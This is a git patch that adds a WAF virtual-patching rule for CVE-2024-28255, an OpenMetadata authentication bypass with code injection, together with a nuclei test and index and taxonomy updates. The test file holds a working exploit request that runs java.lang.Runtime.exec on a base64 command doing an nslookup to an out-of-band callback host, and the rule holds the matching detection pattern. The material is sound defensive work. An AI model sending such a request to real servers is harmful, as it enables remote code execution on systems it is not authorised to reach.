From 1bcbeb1ba210e966c71ce7a30ede872e86b807b1 Mon Sep 17 00:00:00 2001 From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com> Date: Wed, 31 Jul 2024 11:07:41 +0200 Subject: [PATCH] Add CVE-2024-28255 (#1082) * Add CVE-2024-28255 --------- Co-authored-by: GitHub Action --- .../vpatch-CVE-2024-28255/config.yaml | 5 + .../test-CVE-2024-28255.yaml | 25 ++++ .index.json | 38 +++++- .../crowdsecurity/vpatch-CVE-2024-28255.yaml | 38 ++++++ .../appsec-virtual-patching.yaml | 123 +++++++++--------- taxonomy/scenarios.json | 22 ++++ 6 files changed, 187 insertions(+), 64 deletions(-) create mode 100644 .appsec-tests/vpatch-CVE-2024-28255/config.yaml create mode 100644 .appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml create mode 100644 appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml diff --git a/.appsec-tests/vpatch-CVE-2024-28255/config.yaml b/.appsec-tests/vpatch-CVE-2024-28255/config.yaml new file mode 100644 index 00000000000..ab73581a4fa --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2024-28255/config.yaml @@ -0,0 +1,5 @@ + +appsec-rules: +- ./appsec-rules/crowdsecurity/base-config.yaml +- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml +nuclei_template: test-CVE-2024-28255.yaml diff --git a/.appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml b/.appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml new file mode 100644 index 00000000000..8ee35afb658 --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml @@ -0,0 +1,25 @@ + +id: test-CVE-2024-28255 +info: + name: test-CVE-2024-28255 + author: crowdsec + severity: info + description: test-CVE-2024-28255 testing + tags: appsec-testing +variables: + callback: "{{interactsh-url}}" + cmd: "nslookup {{callback}}" + payload: '{{base64(cmd)}}' +http: + - raw: + - | + GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + condition: and + dsl: + - "status_code_1 == 403" + diff --git a/.index.json b/.index.json index 19a87914723..ebbe9e8ad8d 100644 --- a/.index.json +++ b/.index.json @@ -1876,6 +1876,33 @@ "type": "exploit" } }, + "crowdsecurity/vpatch-CVE-2024-28255": { + "path": "appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml", + "version": "0.1", + "versions": { + "0.1": { + "digest": "a8dcb3b263333cd588e22e561d24c4c7b9da54c1a83fcc8da60b4ac5acfacaae", + "deprecated": false + } + }, + "content": "Cm5hbWU6IGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTI4MjU1CmRlc2NyaXB0aW9uOiAiT3Blbk1ldGFkYXRhIC0gQXV0aGVudGljYXRpb24gQnlwYXNzIChDVkUtMjAyNC0yODI1NSkiCnJ1bGVzOgogIC0gYW5kOgogICAgLSB6b25lczoKICAgICAgLSBNRVRIT0QKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IEdFVAogICAgLSB6b25lczoKICAgICAgLSBVUkkKICAgICAgdHJhbnNmb3JtOgogICAgICAtIGxvd2VyY2FzZQogICAgICAtIHVybGRlY29kZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBjb250YWlucwogICAgICAgIHZhbHVlOiAvYXBpL3YxO3YxL3VzZXJzL2xvZ2luL2V2ZW50cy9zdWJzY3JpcHRpb25zL3ZhbGlkYXRpb24vY29uZGl0aW9uCiAgICAtIHpvbmVzOgogICAgICAtIFVSSV9GVUxMCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogImphdmEubGFuZy5ydW50aW1lIgoKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiT3Blbk1ldGFkYXRhIC0gQXV0aGVudGljYXRpb24gQnlwYXNzIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAyNC0yODI1NQogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtOTQ=", + "description": "OpenMetadata - Authentication Bypass (CVE-2024-28255)", + "author": "crowdsecurity", + "labels": { + "behavior": "http:exploit", + "classification": [ + "cve.CVE-2024-28255", + "attack.T1595", + "attack.T1190", + "cwe.CWE-94" + ], + "confidence": 3, + "label": "OpenMetadata - Authentication Bypass", + "service": "http", + "spoofable": 0, + "type": "exploit" + } + }, "crowdsecurity/vpatch-CVE-2024-29849": { "path": "appsec-rules/crowdsecurity/vpatch-CVE-2024-29849.yaml", "version": "0.5", @@ -2889,7 +2916,7 @@ }, "crowdsecurity/appsec-virtual-patching": { "path": "collections/crowdsecurity/appsec-virtual-patching.yaml", - "version": "3.3", + "version": "3.4", "versions": { "0.1": { "digest": "a165d638c8d826a932e4ca4e70ec5379d558a0bee1356e871c7c92cc2df714fc", @@ -3022,10 +3049,14 @@ "3.3": { "digest": "7cd4bdca37098a2a398262c253dfa2d2925168b1820cc58ea62ea953a1517722", "deprecated": false + }, + "3.4": { + "digest": "0b89691d948596e37fc998f369d2f782b0357f0036a6752ae5b3811566615236", + "deprecated": false } }, "long_description": "IyBBcHBTZWMgVmlydHVhbCBQYXRjaGluZwoKVGhpcyBjb2xsZWN0aW9uIGNvbnRhaW5zIHZpcnR1YWwgcGF0Y2hpbmcgZm9yIGNvbW1vbmx5IGV4cGxvaXRlZCB2dWxuZXJhYmlsaXRpZXMsIGFuZCBpcyBpbnNwaXJlZCBieSB0aGUgW0NJU0EgS25vd24gRXhwbG9pdGVkIFZ1bG5lcmFiaWxpdGllcyBDYXRhbG9nXShodHRwczovL3d3dy5jaXNhLmdvdi9rbm93bi1leHBsb2l0ZWQtdnVsbmVyYWJpbGl0aWVzLWNhdGFsb2cpLiBUaGUgZ29hbCBpcyB0byBwcm92aWRlIHZpcnR1YWwgcGF0Y2hpbmcgY2FwYWJpbGl0aWVzIGZvciB0aGUgbW9zdCBvZnRlbiBleHBsb2l0ZWQgdnVsbmVyYWJpbGl0aWVzLCBhdm9pZGluZyBmYWxzZSBwb3NpdGl2ZXMgd2hpbGUgY2F0Y2hpbmcgcGVvcGxlIHNjb3V0aW5nIHlvdXIgYXBwbGljYXRpb25zIGZvciBqdWljeSB2dWxuZXJhYmlsaXRpZXMuCg==", - "content": "bmFtZTogY3Jvd2RzZWN1cml0eS9hcHBzZWMtdmlydHVhbC1wYXRjaGluZwphcHBzZWMtcnVsZXM6CiAgLSBjcm93ZHNlY3VyaXR5L2Jhc2UtY29uZmlnCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1lbnYtYWNjZXNzCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00MDA0NAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTctOTg0MQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjAtMTE3MzgKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTI3OTI2CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi0zNTkxNAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItNDYxNjkKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIwMTk4CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yMjUxNQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzM2MTcKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM0MzYyCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zNTE5CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00Mjc5MwogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNTAxNjQKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM4MjA1CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yNDQ4OQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMzEyOQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMjI5NDEKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE5LTEyOTg5CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi00NDg3NwogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTgtMTA1NjIKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTY1NTMKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE4LTEwMDA4NjEKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE5LTEwMDMwMzAKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTIyOTY1CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yMzc1MgogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDkwNzAKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLWxhcmF2ZWwtZGVidWctbW9kZQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjgxMjEKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIwLTE3NDk2CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0xMzg5CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy03MDI4CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00NjgwNQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMjM4OTcKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIyNTI3CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zNTA3OAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzUwODIKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTIyOTU0CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0xMjEyCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1zeW1mb255LXByb2ZpbGVyCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1jb25uZWN0d2lzZS1hdXRoLWJ5cGFzcwogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMjIwMjQKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTI3MTk4CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0zMjczCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC00NTc3CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0yOTg0OQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDcyMTgKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLWdpdC1jb25maWcKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTMyMTEzCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0zMjcyCmFwcHNlYy1jb25maWdzOgogIC0gY3Jvd2RzZWN1cml0eS92aXJ0dWFsLXBhdGNoaW5nCiAgLSBjcm93ZHNlY3VyaXR5L2FwcHNlYy1kZWZhdWx0CnBhcnNlcnM6CiAgLSBjcm93ZHNlY3VyaXR5L2FwcHNlYy1sb2dzCnNjZW5hcmlvczoKICAtIGNyb3dkc2VjdXJpdHkvYXBwc2VjLXZwYXRjaApjb250ZXh0czoKICAtIGNyb3dkc2VjdXJpdHkvYXBwc2VjX2Jhc2UKZGVzY3JpcHRpb246ICJhIGdlbmVyaWMgdmlydHVhbCBwYXRjaGluZyBjb2xsZWN0aW9uLCBzdWl0YWJsZSBmb3IgbW9zdCB3ZWIgc2VydmVycy4iCmF1dGhvcjogY3Jvd2RzZWN1cml0eQo=", + "content": "YXBwc2VjLWNvbmZpZ3M6Ci0gY3Jvd2RzZWN1cml0eS92aXJ0dWFsLXBhdGNoaW5nCi0gY3Jvd2RzZWN1cml0eS9hcHBzZWMtZGVmYXVsdAphcHBzZWMtcnVsZXM6Ci0gY3Jvd2RzZWN1cml0eS9iYXNlLWNvbmZpZwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLWVudi1hY2Nlc3MKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00MDA0NAotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE3LTk4NDEKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMC0xMTczOAotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTI3OTI2Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItMzU5MTQKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi00NjE2OQotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIwMTk4Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjI1MTUKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zMzYxNwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM0MzYyCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzUxOQotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTQyNzkzCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNTAxNjQKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zODIwNQotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTI0NDg5Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMzEyOQotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIxLTIyOTQxCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTktMTI5ODkKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi00NDg3NwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE4LTEwNTYyCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNjU1MwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE4LTEwMDA4NjEKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAxOS0xMDAzMDMwCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItMjI5NjUKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yMzc1MgotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTQ5MDcwCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtbGFyYXZlbC1kZWJ1Zy1tb2RlCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjgxMjEKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMC0xNzQ5NgotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTEzODkKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy03MDI4Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDY4MDUKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0yMzg5NwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIyNTI3Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzUwNzgKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zNTA4MgotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTIyOTU0Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMTIxMgotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLXN5bWZvbnktcHJvZmlsZXIKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1jb25uZWN0d2lzZS1hdXRoLWJ5cGFzcwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTIyMDI0Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMjcxOTgKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0zMjczCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtNDU3NwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTI5ODQ5Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDcyMTgKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1naXQtY29uZmlnCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMzIxMTMKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0zMjcyCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMjgyNTUKYXV0aG9yOiBjcm93ZHNlY3VyaXR5CmNvbnRleHRzOgotIGNyb3dkc2VjdXJpdHkvYXBwc2VjX2Jhc2UKZGVzY3JpcHRpb246IGEgZ2VuZXJpYyB2aXJ0dWFsIHBhdGNoaW5nIGNvbGxlY3Rpb24sIHN1aXRhYmxlIGZvciBtb3N0IHdlYiBzZXJ2ZXJzLgpuYW1lOiBjcm93ZHNlY3VyaXR5L2FwcHNlYy12aXJ0dWFsLXBhdGNoaW5nCnBhcnNlcnM6Ci0gY3Jvd2RzZWN1cml0eS9hcHBzZWMtbG9ncwpzY2VuYXJpb3M6Ci0gY3Jvd2RzZWN1cml0eS9hcHBzZWMtdnBhdGNoCg==", "description": "a generic virtual patching collection, suitable for most web servers.", "author": "crowdsecurity", "labels": null, @@ -3086,7 +3117,8 @@ "crowdsecurity/vpatch-CVE-2023-47218", "crowdsecurity/vpatch-git-config", "crowdsecurity/vpatch-CVE-2024-32113", - "crowdsecurity/vpatch-CVE-2024-3272" + "crowdsecurity/vpatch-CVE-2024-3272", + "crowdsecurity/vpatch-CVE-2024-28255" ], "appsec-configs": [ "crowdsecurity/virtual-patching", diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml new file mode 100644 index 00000000000..893a34df373 --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml @@ -0,0 +1,38 @@ + +name: crowdsecurity/vpatch-CVE-2024-28255 +description: "OpenMetadata - Authentication Bypass (CVE-2024-28255)" +rules: + - and: + - zones: + - METHOD + match: + type: equals + value: GET + - zones: + - URI + transform: + - lowercase + - urldecode + match: + type: contains + value: /api/v1;v1/users/login/events/subscriptions/validation/condition + - zones: + - URI_FULL + transform: + - lowercase + match: + type: contains + value: "java.lang.runtime" + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: "http:exploit" + label: "OpenMetadata - Authentication Bypass" + classification: + - cve.CVE-2024-28255 + - attack.T1595 + - attack.T1190 + - cwe.CWE-94 \ No newline at end of file diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml index 56ab52c18f1..6c570c5382b 100644 --- a/collections/crowdsecurity/appsec-virtual-patching.yaml +++ b/collections/crowdsecurity/appsec-virtual-patching.yaml @@ -1,64 +1,65 @@ -name: crowdsecurity/appsec-virtual-patching -appsec-rules: - - crowdsecurity/base-config - - crowdsecurity/vpatch-env-access - - crowdsecurity/vpatch-CVE-2023-40044 - - crowdsecurity/vpatch-CVE-2017-9841 - - crowdsecurity/vpatch-CVE-2020-11738 - - crowdsecurity/vpatch-CVE-2022-27926 - - crowdsecurity/vpatch-CVE-2022-35914 - - crowdsecurity/vpatch-CVE-2022-46169 - - crowdsecurity/vpatch-CVE-2023-20198 - - crowdsecurity/vpatch-CVE-2023-22515 - - crowdsecurity/vpatch-CVE-2023-33617 - - crowdsecurity/vpatch-CVE-2023-34362 - - crowdsecurity/vpatch-CVE-2023-3519 - - crowdsecurity/vpatch-CVE-2023-42793 - - crowdsecurity/vpatch-CVE-2023-50164 - - crowdsecurity/vpatch-CVE-2023-38205 - - crowdsecurity/vpatch-CVE-2023-24489 - - crowdsecurity/vpatch-CVE-2021-3129 - - crowdsecurity/vpatch-CVE-2021-22941 - - crowdsecurity/vpatch-CVE-2019-12989 - - crowdsecurity/vpatch-CVE-2022-44877 - - crowdsecurity/vpatch-CVE-2018-10562 - - crowdsecurity/vpatch-CVE-2023-6553 - - crowdsecurity/vpatch-CVE-2018-1000861 - - crowdsecurity/vpatch-CVE-2019-1003030 - - crowdsecurity/vpatch-CVE-2022-22965 - - crowdsecurity/vpatch-CVE-2023-23752 - - crowdsecurity/vpatch-CVE-2023-49070 - - crowdsecurity/vpatch-laravel-debug-mode - - crowdsecurity/vpatch-CVE-2023-28121 - - crowdsecurity/vpatch-CVE-2020-17496 - - crowdsecurity/vpatch-CVE-2023-1389 - - crowdsecurity/vpatch-CVE-2023-7028 - - crowdsecurity/vpatch-CVE-2023-46805 - - crowdsecurity/vpatch-CVE-2024-23897 - - crowdsecurity/vpatch-CVE-2023-22527 - - crowdsecurity/vpatch-CVE-2023-35078 - - crowdsecurity/vpatch-CVE-2023-35082 - - crowdsecurity/vpatch-CVE-2022-22954 - - crowdsecurity/vpatch-CVE-2024-1212 - - crowdsecurity/vpatch-symfony-profiler - - crowdsecurity/vpatch-connectwise-auth-bypass - - crowdsecurity/vpatch-CVE-2024-22024 - - crowdsecurity/vpatch-CVE-2024-27198 - - crowdsecurity/vpatch-CVE-2024-3273 - - crowdsecurity/vpatch-CVE-2024-4577 - - crowdsecurity/vpatch-CVE-2024-29849 - - crowdsecurity/vpatch-CVE-2023-47218 - - crowdsecurity/vpatch-git-config - - crowdsecurity/vpatch-CVE-2024-32113 - - crowdsecurity/vpatch-CVE-2024-3272 appsec-configs: - - crowdsecurity/virtual-patching - - crowdsecurity/appsec-default +- crowdsecurity/virtual-patching +- crowdsecurity/appsec-default +appsec-rules: +- crowdsecurity/base-config +- crowdsecurity/vpatch-env-access +- crowdsecurity/vpatch-CVE-2023-40044 +- crowdsecurity/vpatch-CVE-2017-9841 +- crowdsecurity/vpatch-CVE-2020-11738 +- crowdsecurity/vpatch-CVE-2022-27926 +- crowdsecurity/vpatch-CVE-2022-35914 +- crowdsecurity/vpatch-CVE-2022-46169 +- crowdsecurity/vpatch-CVE-2023-20198 +- crowdsecurity/vpatch-CVE-2023-22515 +- crowdsecurity/vpatch-CVE-2023-33617 +- crowdsecurity/vpatch-CVE-2023-34362 +- crowdsecurity/vpatch-CVE-2023-3519 +- crowdsecurity/vpatch-CVE-2023-42793 +- crowdsecurity/vpatch-CVE-2023-50164 +- crowdsecurity/vpatch-CVE-2023-38205 +- crowdsecurity/vpatch-CVE-2023-24489 +- crowdsecurity/vpatch-CVE-2021-3129 +- crowdsecurity/vpatch-CVE-2021-22941 +- crowdsecurity/vpatch-CVE-2019-12989 +- crowdsecurity/vpatch-CVE-2022-44877 +- crowdsecurity/vpatch-CVE-2018-10562 +- crowdsecurity/vpatch-CVE-2023-6553 +- crowdsecurity/vpatch-CVE-2018-1000861 +- crowdsecurity/vpatch-CVE-2019-1003030 +- crowdsecurity/vpatch-CVE-2022-22965 +- crowdsecurity/vpatch-CVE-2023-23752 +- crowdsecurity/vpatch-CVE-2023-49070 +- crowdsecurity/vpatch-laravel-debug-mode +- crowdsecurity/vpatch-CVE-2023-28121 +- crowdsecurity/vpatch-CVE-2020-17496 +- crowdsecurity/vpatch-CVE-2023-1389 +- crowdsecurity/vpatch-CVE-2023-7028 +- crowdsecurity/vpatch-CVE-2023-46805 +- crowdsecurity/vpatch-CVE-2024-23897 +- crowdsecurity/vpatch-CVE-2023-22527 +- crowdsecurity/vpatch-CVE-2023-35078 +- crowdsecurity/vpatch-CVE-2023-35082 +- crowdsecurity/vpatch-CVE-2022-22954 +- crowdsecurity/vpatch-CVE-2024-1212 +- crowdsecurity/vpatch-symfony-profiler +- crowdsecurity/vpatch-connectwise-auth-bypass +- crowdsecurity/vpatch-CVE-2024-22024 +- crowdsecurity/vpatch-CVE-2024-27198 +- crowdsecurity/vpatch-CVE-2024-3273 +- crowdsecurity/vpatch-CVE-2024-4577 +- crowdsecurity/vpatch-CVE-2024-29849 +- crowdsecurity/vpatch-CVE-2023-47218 +- crowdsecurity/vpatch-git-config +- crowdsecurity/vpatch-CVE-2024-32113 +- crowdsecurity/vpatch-CVE-2024-3272 +- crowdsecurity/vpatch-CVE-2024-28255 +author: crowdsecurity +contexts: +- crowdsecurity/appsec_base +description: a generic virtual patching collection, suitable for most web servers. +name: crowdsecurity/appsec-virtual-patching parsers: - - crowdsecurity/appsec-logs +- crowdsecurity/appsec-logs scenarios: - - crowdsecurity/appsec-vpatch -contexts: - - crowdsecurity/appsec_base -description: "a generic virtual patching collection, suitable for most web servers." -author: crowdsecurity +- crowdsecurity/appsec-vpatch diff --git a/taxonomy/scenarios.json b/taxonomy/scenarios.json index 587a4c7d423..283623f1536 100644 --- a/taxonomy/scenarios.json +++ b/taxonomy/scenarios.json @@ -1125,6 +1125,28 @@ "CWE-94" ] }, + "crowdsecurity/vpatch-CVE-2024-28255": { + "name": "crowdsecurity/vpatch-CVE-2024-28255", + "description": "OpenMetadata - Authentication Bypass (CVE-2024-28255)", + "label": "OpenMetadata - Authentication Bypass", + "behaviors": [ + "http:exploit" + ], + "mitre_attacks": [ + "TA0043:T1595", + "TA0001:T1190" + ], + "confidence": 3, + "spoofable": 0, + "cti": true, + "service": "http", + "cves": [ + "CVE-2024-28255" + ], + "cwes": [ + "CWE-94" + ] + }, "crowdsecurity/vpatch-CVE-2024-29849": { "name": "crowdsecurity/vpatch-CVE-2024-29849", "description": "Veeam Backup Enterprise Manager - Authentication Bypass (CVE-2024-29849)",